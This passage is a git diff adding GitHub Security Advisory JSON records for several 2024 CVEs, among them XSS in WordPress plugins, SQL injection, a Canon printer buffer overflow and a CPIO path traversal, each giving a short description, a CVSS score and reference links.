@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwrp-rr8g-cg9q", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1257" + ], + "details": "A vulnerability was found in Jspxcms 10.2.0. It has been classified as problematic. Affected is an unknown function of the file /ext/collect/find_text.do. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252996.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1257" + }, + { + "type": "WEB", + "url": "https://github.com/sweatxi/BugHub/blob/main/find_text_do.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252996" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252996" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rwv8-w229-vr4v/GHSA-rwv8-w229-vr4v.json b/advisories/unreviewed/2024/02/GHSA-rwv8-w229-vr4v/GHSA-rwv8-w229-vr4v.json new file mode 100644 index 0000000000000..fc5ab0e410f19 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rwv8-w229-vr4v/GHSA-rwv8-w229-vr4v.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwv8-w229-vr4v", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0370" + ], + "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0370" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v3f3-6g4p-2h35/GHSA-v3f3-6g4p-2h35.json b/advisories/unreviewed/2024/02/GHSA-v3f3-6g4p-2h35/GHSA-v3f3-6g4p-2h35.json new file mode 100644 index 0000000000000..9417458002f2d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v3f3-6g4p-2h35/GHSA-v3f3-6g4p-2h35.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3f3-6g4p-2h35", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-23756" + ], + "details": "The HTTP PUT and DELETE methods are enabled in the Plone official Docker version 5.2.13 (5221), allowing unauthenticated attackers to execute dangerous actions such as uploading files to the server or deleting them.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23756" + }, + { + "type": "WEB", + "url": "https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-23756" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v3x4-p7hr-w52x/GHSA-v3x4-p7hr-w52x.json b/advisories/unreviewed/2024/02/GHSA-v3x4-p7hr-w52x/GHSA-v3x4-p7hr-w52x.json new file mode 100644 index 0000000000000..97ea864ba84b4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v3x4-p7hr-w52x/GHSA-v3x4-p7hr-w52x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3x4-p7hr-w52x", + "modified": "2024-02-06T03:32:58Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51684" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Digital Downloads Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy) allows Stored XSS.This issue affects Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy): from n/a through 3.2.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51684" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/easy-digital-downloads/wordpress-easy-digital-downloads-plugin-3-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v42h-5rm7-cppg/GHSA-v42h-5rm7-cppg.json b/advisories/unreviewed/2024/02/GHSA-v42h-5rm7-cppg/GHSA-v42h-5rm7-cppg.json new file mode 100644 index 0000000000000..015397e1fbbd7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v42h-5rm7-cppg/GHSA-v42h-5rm7-cppg.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v42h-5rm7-cppg", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2023-6231" + ], + "details": "Buffer overflow in WSD probe request process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6231" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v4cg-mf2j-mwp7/GHSA-v4cg-mf2j-mwp7.json b/advisories/unreviewed/2024/02/GHSA-v4cg-mf2j-mwp7/GHSA-v4cg-mf2j-mwp7.json new file mode 100644 index 0000000000000..d872907a5beca --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v4cg-mf2j-mwp7/GHSA-v4cg-mf2j-mwp7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4cg-mf2j-mwp7", + "modified": "2024-02-02T21:31:29Z", + "published": "2024-02-02T21:31:29Z", + "aliases": [ + "CVE-2023-37527" + ], + "details": "A reflected cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform can possibly allow an attacker to execute malicious javascript code in the application session or in database, via remote injection, while rendering content in a web page. \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37527" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T19:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v4r9-2j27-fxxf/GHSA-v4r9-2j27-fxxf.json b/advisories/unreviewed/2024/02/GHSA-v4r9-2j27-fxxf/GHSA-v4r9-2j27-fxxf.json new file mode 100644 index 0000000000000..0fa27a0ed6346 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v4r9-2j27-fxxf/GHSA-v4r9-2j27-fxxf.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4r9-2j27-fxxf", + "modified": "2024-02-05T06:30:30Z", + "published": "2024-02-05T06:30:30Z", + "aliases": [ + "CVE-2024-20001" + ], + "details": "In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961601; Issue ID: DTV03961601.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20001" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v53j-mp5w-59f7/GHSA-v53j-mp5w-59f7.json b/advisories/unreviewed/2024/02/GHSA-v53j-mp5w-59f7/GHSA-v53j-mp5w-59f7.json new file mode 100644 index 0000000000000..81c888f424d08 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v53j-mp5w-59f7/GHSA-v53j-mp5w-59f7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v53j-mp5w-59f7", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2023-51951" + ], + "details": "SQL Injection vulnerability in Stock Management System 1.0 allows a remote attacker to execute arbitrary code via the id parameter in the manage_bo.php file.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51951" + }, + { + "type": "WEB", + "url": "https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2023-004" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T21:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v5vm-g52c-4v89/GHSA-v5vm-g52c-4v89.json b/advisories/unreviewed/2024/02/GHSA-v5vm-g52c-4v89/GHSA-v5vm-g52c-4v89.json new file mode 100644 index 0000000000000..c27910263511c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v5vm-g52c-4v89/GHSA-v5vm-g52c-4v89.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5vm-g52c-4v89", + "modified": "2024-02-01T12:30:21Z", + "published": "2024-02-01T12:30:21Z", + "aliases": [ + "CVE-2023-52192" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Keap Keap Official Opt-in Forms allows Stored XSS.This issue affects Keap Official Opt-in Forms: from n/a through 1.0.11.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52192" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/infusionsoft-official-opt-in-forms/wordpress-keap-official-opt-in-forms-plugin-1-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v62h-prj4-9v6m/GHSA-v62h-prj4-9v6m.json b/advisories/unreviewed/2024/02/GHSA-v62h-prj4-9v6m/GHSA-v62h-prj4-9v6m.json new file mode 100644 index 0000000000000..845589e0da585 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v62h-prj4-9v6m/GHSA-v62h-prj4-9v6m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v62h-prj4-9v6m", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-01T12:30:21Z", + "aliases": [ + "CVE-2023-52191" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS.This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52191" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/infogram/wordpress-infogram-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v63h-fjp2-v8q9/GHSA-v63h-fjp2-v8q9.json b/advisories/unreviewed/2024/02/GHSA-v63h-fjp2-v8q9/GHSA-v63h-fjp2-v8q9.json new file mode 100644 index 0000000000000..3c0b17a44c61a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v63h-fjp2-v8q9/GHSA-v63h-fjp2-v8q9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v63h-fjp2-v8q9", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-06T18:30:20Z", + "aliases": [ + "CVE-2023-35188" + ], + "details": "\nSQL Injection Remote Code Execution Vulnerability was found using a create statement in the SolarWinds Platform. This vulnerability requires user authentication to be exploited.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35188" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2024-1_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2023-35188" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v78v-jm8m-vmmw/GHSA-v78v-jm8m-vmmw.json b/advisories/unreviewed/2024/02/GHSA-v78v-jm8m-vmmw/GHSA-v78v-jm8m-vmmw.json new file mode 100644 index 0000000000000..d8d42e0d54f73 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v78v-jm8m-vmmw/GHSA-v78v-jm8m-vmmw.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v78v-jm8m-vmmw", + "modified": "2024-02-05T09:30:29Z", + "published": "2024-02-05T09:30:29Z", + "aliases": [ + "CVE-2021-4436" + ], + "details": "The 3DPrint Lite WordPress plugin before 1.9.1.5 does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4436" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T09:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v82p-3pq8-jrvq/GHSA-v82p-3pq8-jrvq.json b/advisories/unreviewed/2024/02/GHSA-v82p-3pq8-jrvq/GHSA-v82p-3pq8-jrvq.json new file mode 100644 index 0000000000000..18672642bb1fe --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v82p-3pq8-jrvq/GHSA-v82p-3pq8-jrvq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v82p-3pq8-jrvq", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-52118" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Event Manager WP User Profile Avatar allows Stored XSS.This issue affects WP User Profile Avatar: from n/a through 1.0.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52118" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-user-profile-avatar/wordpress-wp-user-profile-avatar-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v8v7-r333-8h8w/GHSA-v8v7-r333-8h8w.json b/advisories/unreviewed/2024/02/GHSA-v8v7-r333-8h8w/GHSA-v8v7-r333-8h8w.json new file mode 100644 index 0000000000000..d17ea51de542d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v8v7-r333-8h8w/GHSA-v8v7-r333-8h8w.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8v7-r333-8h8w", + "modified": "2024-02-03T00:31:34Z", + "published": "2024-02-03T00:31:34Z", + "aliases": [ + "CVE-2024-1199" + ], + "details": "A vulnerability has been found in CodeAstro Employee Task Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file \\employee-tasks-php\\attendance-info.php. The manipulation of the argument aten_id leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252697 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1199" + }, + { + "type": "WEB", + "url": "https://docs.qq.com/doc/DYnhIWEdkZXViTXdD" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252697" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252697" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T00:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v8xr-j3gp-fmxj/GHSA-v8xr-j3gp-fmxj.json b/advisories/unreviewed/2024/02/GHSA-v8xr-j3gp-fmxj/GHSA-v8xr-j3gp-fmxj.json new file mode 100644 index 0000000000000..d02750c66a680 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v8xr-j3gp-fmxj/GHSA-v8xr-j3gp-fmxj.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8xr-j3gp-fmxj", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2023-6535" + ], + "details": "A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6535" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0724" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6535" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254053" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v92p-76ff-mghv/GHSA-v92p-76ff-mghv.json b/advisories/unreviewed/2024/02/GHSA-v92p-76ff-mghv/GHSA-v92p-76ff-mghv.json new file mode 100644 index 0000000000000..284ce1fbf8003 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v92p-76ff-mghv/GHSA-v92p-76ff-mghv.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v92p-76ff-mghv", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6983" + ], + "details": "The Display custom fields in the frontend – Post and User Profile Fields plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.1 via the vg_display_data shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve potentially sensitive post meta.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6983" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/08d43c67-df40-4f1a-a351-803e59edee13?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json b/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json new file mode 100644 index 0000000000000..2b673aad931f1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v96m-4x27-3m5j", + "modified": "2024-02-07T15:30:49Z", + "published": "2024-02-07T15:30:49Z", + "aliases": [ + "CVE-2024-24189" + ], + "details": "Jsish v3.5.0 (commit 42c694c) was discovered to contain a use-after-free via the SplitChar at ./src/jsiUtils.c.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24189" + }, + { + "type": "WEB", + "url": "https://github.com/pcmacdon/jsish/issues/101" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v9vx-4mxw-76j2/GHSA-v9vx-4mxw-76j2.json b/advisories/unreviewed/2024/02/GHSA-v9vx-4mxw-76j2/GHSA-v9vx-4mxw-76j2.json new file mode 100644 index 0000000000000..5e257020e365d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v9vx-4mxw-76j2/GHSA-v9vx-4mxw-76j2.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9vx-4mxw-76j2", + "modified": "2024-02-05T15:30:23Z", + "published": "2024-02-05T15:30:23Z", + "aliases": [ + "CVE-2023-7216" + ], + "details": "A path traversal vulnerability was found in the CPIO utility. This issue could allow a remote unauthenticated attacker to trick a user into opening a specially crafted archive. During the extraction process, the archiver could follow symlinks outside of the intended directory, which could be utilized to run arbitrary commands on the target system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7216" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-7216" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vf69-288w-g5cx/GHSA-vf69-288w-g5cx.json b/advisories/unreviewed/2024/02/GHSA-vf69-288w-g5cx/GHSA-vf69-288w-g5cx.json new file mode 100644 index 0000000000000..f33b43f700f5e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vf69-288w-g5cx/GHSA-vf69-288w-g5cx.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf69-288w-g5cx", + "modified": "2024-02-08T06:30:23Z", + "published": "2024-02-08T06:30:23Z", + "aliases": [ + "CVE-2023-5665" + ], + "details": "The Payment Forms for Paystack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5665" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1013" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1054" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1128" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1164" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1194" + }, + { + "type": "WEB", + "url": 